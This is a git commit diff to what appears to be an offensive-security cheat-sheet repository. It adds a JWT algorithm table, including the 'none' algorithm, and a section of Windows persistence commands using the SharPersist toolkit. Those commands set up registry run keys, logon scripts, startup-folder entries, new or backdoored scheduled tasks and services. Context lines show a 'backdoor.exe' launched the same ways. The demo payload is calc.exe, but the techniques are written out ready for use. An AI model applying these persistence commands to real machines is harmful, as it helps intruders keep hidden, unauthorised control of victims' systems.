SharpPersist - Windows Persistence
parent
5455c30ec7
commit
742e3204d3
|
@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements |
|
||||||
|
|---|---|---|
|
||||||
|
| HS256 | HMAC using SHA-256 | Required |
|
||||||
|
| HS384 | HMAC using SHA-384 | Optional |
|
||||||
|
| HS512 | HMAC using SHA-512 | Optional |
|
||||||
|
| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended |
|
||||||
|
| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional |
|
||||||
|
| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional |
|
||||||
|
| ES256 | ECDSA using P-256 and SHA-256 | Recommended |
|
||||||
|
| ES384 | ECDSA using P-384 and SHA-384 | Optional |
|
||||||
|
| ES512 | ECDSA using P-521 and SHA-512 | Optional |
|
||||||
|
| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional |
|
||||||
|
| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional |
|
||||||
|
| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional |
|
||||||
|
| none | No digital signature or MAC performed | Required |
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Payload
|
### Payload
|
||||||
|
|
||||||
```json
|
```json
|
||||||
|
@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||||
- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
|
- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
|
||||||
- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
|
- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
|
||||||
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||||
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
||||||
|
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
|
|
@ -2,6 +2,7 @@
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
* [Userland](#userland)
|
* [Userland](#userland)
|
||||||
* [Registry](#registry)
|
* [Registry](#registry)
|
||||||
* [Startup](#startup)
|
* [Startup](#startup)
|
||||||
|
@ -13,6 +14,10 @@
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
||||||
|
|
||||||
## Userland
|
## Userland
|
||||||
|
|
||||||
### Registry
|
### Registry
|
||||||
|
@ -24,6 +29,14 @@ Value name: Backdoor
|
||||||
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using SharPersist
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
|
||||||
|
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
|
||||||
|
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
|
||||||
|
```
|
||||||
|
|
||||||
### Startup
|
### Startup
|
||||||
|
|
||||||
Create a batch script in the user startup folder.
|
Create a batch script in the user startup folder.
|
||||||
|
@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
|
||||||
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using SharPersist
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
|
||||||
|
```
|
||||||
|
|
||||||
### Scheduled Task
|
### Scheduled Task
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
||||||
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using SharPersist
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Add to a current scheduled task
|
||||||
|
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
|
||||||
|
|
||||||
|
# Add new task
|
||||||
|
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
|
||||||
|
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
||||||
|
```
|
||||||
|
|
||||||
|
## Windows Service
|
||||||
|
|
||||||
|
Using SharPersist
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
|
||||||
|
```
|
||||||
|
|
||||||
## Elevated
|
## Elevated
|
||||||
|
|
||||||
### HKLM
|
### HKLM
|
||||||
|
@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
||||||
|
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
Loading…
Reference in New Issue